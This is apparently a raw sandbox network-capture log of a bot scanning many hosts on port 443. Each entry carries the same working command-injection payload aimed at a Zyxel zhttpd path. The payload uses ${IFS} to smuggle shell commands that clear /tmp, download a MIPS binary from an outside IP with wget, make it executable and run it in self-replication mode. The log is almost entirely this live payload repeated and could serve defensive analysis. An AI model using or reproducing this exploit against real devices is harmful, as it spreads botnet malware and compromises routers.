                                                        Jan 28, 2024 10:12:58.517502069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5911192.168.2.1460456125.255.156.176443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.517539024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5912192.168.2.144614471.120.161.196443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.517574072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5913192.168.2.145740638.172.192.44443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.517602921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5914192.168.2.1438670120.232.113.94443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.517630100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5915192.168.2.1459882166.98.92.163443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.517688990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5916192.168.2.1434788185.38.185.119443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.517729998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5917192.168.2.1435376196.55.111.98443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.517760992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5918192.168.2.1439400170.2.182.149443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.517792940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5919192.168.2.144364057.128.237.100443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.517837048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5920192.168.2.1447272137.25.134.203443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.517877102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5921192.168.2.145780814.144.77.241443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.517894983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5922192.168.2.1444882142.82.102.174443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.517951012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5923192.168.2.1435476126.129.171.196443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.517988920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5924192.168.2.1439230187.37.10.220443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.518035889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5925192.168.2.14427548.167.181.49443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.518068075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5926192.168.2.144938852.48.141.130443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.518114090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5927192.168.2.145657497.118.208.223443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.518141985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5928192.168.2.145235494.127.42.41443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.518193007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5929192.168.2.1449440145.164.202.179443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.518224955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5930192.168.2.143818843.2.155.191443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.518273115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5931192.168.2.1459160126.117.139.114443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.518306017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5932192.168.2.144775219.217.191.5443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.518346071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5933192.168.2.145424236.237.45.216443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.518371105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5934192.168.2.1436202206.218.96.191443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.518420935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5935192.168.2.1444258102.241.83.112443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.518460989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5936192.168.2.1442944191.115.179.159443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.518497944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5937192.168.2.1434764130.190.167.20443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.518534899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5938192.168.2.1443672196.144.108.243443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.518584013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5939192.168.2.144345648.199.110.26443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.518629074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5940192.168.2.1435426164.85.223.250443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.518655062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5941192.168.2.1449000197.246.126.63443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.518697023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5942192.168.2.1451648198.180.140.144443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.518743992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5943192.168.2.1439902124.35.29.15443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.518771887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5944192.168.2.1440866125.134.253.104443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.518800020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5945192.168.2.1454018134.123.41.45443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.518837929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5946192.168.2.146041897.254.146.96443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.518871069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5947192.168.2.143523844.53.233.239443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.518892050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5948192.168.2.1459012186.153.42.210443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.518928051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5949192.168.2.145122278.116.96.246443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.518970966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5950192.168.2.1450992204.167.170.193443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.519002914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5951192.168.2.1451524157.93.241.19443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.519037008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5952192.168.2.1444484122.7.173.231443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.519073009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5953192.168.2.1438566181.213.243.29443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.519118071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5954192.168.2.1435874141.182.144.69443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.519140005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5955192.168.2.1447844223.11.142.218443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.519186974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5956192.168.2.1438038101.138.47.61443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.519212008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5957192.168.2.145015225.172.202.245443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.519251108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5958192.168.2.1441328112.43.218.203443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.519293070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5959192.168.2.14403305.126.252.51443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.519329071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5960192.168.2.1437720128.1.147.231443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.519376040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5961192.168.2.1445522198.27.98.209443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.519409895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5962192.168.2.145370462.69.36.105443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.519463062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5963192.168.2.1456526206.159.133.72443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.519490957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5964192.168.2.145995479.221.228.197443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.519526005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5965192.168.2.1456978130.124.171.74443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.519562960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5966192.168.2.143712863.50.217.52443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.519620895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5967192.168.2.1439056143.16.177.103443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.519653082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5968192.168.2.144249485.247.151.87443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.519711018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5969192.168.2.1458398102.103.178.151443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.519737959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5970192.168.2.143508298.76.124.84443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:58.519788980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5971192.168.2.144696434.9.197.104443
                                                        TimestampBytes transferredDirectionData
